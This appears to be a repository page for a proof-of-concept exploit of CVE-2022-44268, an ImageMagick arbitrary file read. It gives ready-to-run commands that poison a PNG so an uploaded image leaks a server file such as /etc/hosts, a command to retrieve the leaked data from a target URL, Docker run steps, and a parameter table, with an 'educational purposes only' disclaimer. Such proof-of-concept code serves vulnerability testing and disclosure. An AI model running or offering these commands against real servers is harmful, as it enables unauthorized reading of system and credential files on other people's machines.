CVE-2022-44268
CVE-2022-44268 copied to clipboard
Published
20 hours ago β’
kljunowsky
kljunowsky
CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit
CVE-2022-44268 π§ββοΈ
CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit
Video πΌ
https://youtu.be/quKxwNAMBIA
Usage π
Poison the image β£οΈ
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Upload poisoned PNG image.
Check if exploit was successful π‘
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Running from Docker :whale:
Build
docker build -t cve-2022-44268 .
Run
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
Parameters π§°
| Parameter | Description | Type |
|---|---|---|
| --url | The URL of the uploaded PNG image | String |
| --image | Input PNG file | File |
| --output | Output PNG file | File |
| --file-to-read | File to read from vulnerable host | String |
Contact Meπ
Educational purposes only and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials of this project.
More details: https://www.metabaseq.com/imagemagick-zero-days/
Metadata
21
Stars
6
Forks
Watchers
Owner
kljunowsky
Metadata
CVE-2022-44268 ImageMagick Arbitrary File Read - Proof of Concept exploit